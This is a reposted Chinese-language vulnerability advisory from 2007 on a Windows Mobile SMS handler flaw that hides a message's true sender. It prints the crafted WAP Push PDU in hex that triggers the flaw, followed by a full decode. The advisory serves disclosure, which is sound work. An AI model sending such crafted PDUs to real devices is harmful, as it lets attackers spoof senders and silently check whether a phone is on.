Microsoft Windows Mobile短信处理器来源迷惑漏洞

2007-10-24 作者:bitsCN整理来源:中国网管联盟点评 投稿 收藏

涉及程序：
Windows Mobile

描述：
Microsoft Windows Mobile短信处理器来源迷惑漏洞

详细：
Windows Mobile是微软开发的用于手机的操作系统。

中国网管论坛bbs.bitsCN.com

Windows Mobile的短信处理器中存在安全漏洞，如果发送了特制的WAP PUSH消息的话，就可能在接收者的手机上隐藏原始短信的发送者。网管网www_bitscn_com

原始PDU如[1]所示，以下PDU会导致Pocket PC电话版本的SMS处理器错误的解码PDU，这样发送者的手机号码和发送时间都是错误的。网管u家u.bitscn@com

[1] PDU（自动换行）
079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
696C652E636F6D000101

网管联盟bitsCN@com

PDU的解码请见[2]。当SmartPhone接收到这条消息的时候，就会未经交互便将其丢弃，这也允许攻击者未经短信接收者确认便可以判断对方手机是否打开。网管论坛bbs_bitsCN_com

[2] PDU解码

网管u家u.bitsCN.com

PDU LENGTH IS 118 BYTES
ADDRESS OF DELIVERING SMSC
   NUMBER IS : +447785016005
   TYPE OF NR. : International
   NPI : ISDN/Telephone (E.164/163) 中国网管联盟bitsCN.com

MESSAGE HEADER FLAGS
   MESSAGE TYPE : SMS SUBMIT
   REJECT DUPLICATES : NO
   VALIDITY PERIOD : RELATIVE
   REPLY PATH : NO
   USER DATA HEADER : PRESENT
   REQ. STATUS REPORT : NO
   MSG REFERENCE NR. : 34 (0x22)

中国网管论坛bbs.bitsCN.com

DESTINATION ADDRESS
NUMBER IS : +447716299660
TYPE OF NR. : International
NPI : ISDN/Telephone (E.164/163) 网管下载dl.bitscn.com

PROTOCOL IDENTIFIER (0x00)
MESSAGE ENTITIES : SME-to-SME
PROTOCOL USED : Implicit / SC-specific 中国网管联盟bitsCN.com

DATA CODING SCHEME (0x04)
   AUTO-DELETION : OFF
   COMPRESSION : OFF
   MESSAGE CLASS : NONE
   ALPHABET USED : 8bit data 网管联盟bitsCN_com

VALIDITY OF MESSAGE : 24.0 hrs

网管下载dl.bitscn.com

USER DATA PART OF SM
   USER DATA LENGTH : 96 octets
   UDH LENGTH : 6 octets
   UDH : 05 04 0B 84 23 F0
   UDH ELEMENTS : 05 - Appl. port addressing 16bit
     4 (0x04) Bytes Information Element
      09200 : SOURCE port is: allocated by IANA
     02948 : DESTINATION port is: allocated by IANA
   --- DATA ----------------------
     05 04 0B 84 23 F0
     USER DATA (TEXT) : %®ê¯‚´„jEÆ
   symantec…Symantec
     bulkSMS (Unregistered Ver) -
     LogixMobile.com 网管网www_bitscn_com

<*来源：Ollie Whitehouse （ollie@atstake.com）网管bitscn_com

链接：http://www.symantec.com/content/en/us/enterprise/research/SYMSA-2007-011.txt
*> 网管u家u.bitscn@com

受影响系统：
Microsoft Windows Mobile 5 PocketPC

攻击方法：
暂无有效攻击代码

解决方案：
厂商补丁：

网管联盟bitsCN@com

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：网管u家u.bitsCN.com

http://www.microsoft.com/technet/security/

中国网管联盟bitsCN.com

顶一下

TAGs：来源漏洞 处理器 短信 PDU DATA Windows MESSAGE OF

上一篇：Oracle TNS Listener GIOP远程拒绝服务及信息泄露漏洞下一篇：Django i18n远程拒绝服务漏洞

Microsoft Windows Mobile短信处理器来源迷惑漏洞

2007-10-24 作者:bitsCN整理 来源:中国网管联盟 点评 投稿 收藏

2007-10-24 作者:bitsCN整理来源:中国网管联盟点评投稿收藏